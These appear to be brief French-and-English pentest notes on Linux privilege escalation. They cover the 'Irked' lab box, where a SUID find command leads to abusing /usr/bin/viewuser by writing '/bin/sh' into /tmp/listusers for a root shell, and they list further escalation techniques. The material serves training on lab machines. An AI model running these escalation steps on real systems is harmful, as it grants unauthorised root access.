* https://github.com/nongiach/sudo_inject

*

Irked :

Recherche de fichiers avec SUID permissions :

find / -perm -u=s -type=f 2>/dev/null

1 fichier intéressant trouvé : /usr/bin/viewuser

Description :

So, when I run the program, I found that this application was being developed to set test user permissions but couldn’t find listusers file within /tmp. This program is, therefore, searching for data from the listusers file and the file is missing from the directory inside /tmp.

Utilisation :

echo '/bin/sh' > /tmp/listusers

chmod 777 /tmp/listusers

/usr/bin/viewuser

*

Linux Privilege Escalation via Automated Script

Exploiting Wildcard for Privilege Escalation

Linux Privilege Escalation by Exploiting Cronjobs

Linux Privilege Escalation using LD_Preload

Linux Privilege Escalation Using PATH Variable

Linux Privilege Escalation using Misconfigured NFS

Linux Privilege Escalation using Sudo Rights

Linux Privilege Escalation using SUID Binaries

Editing /etc/passwd File for Privilege Escalation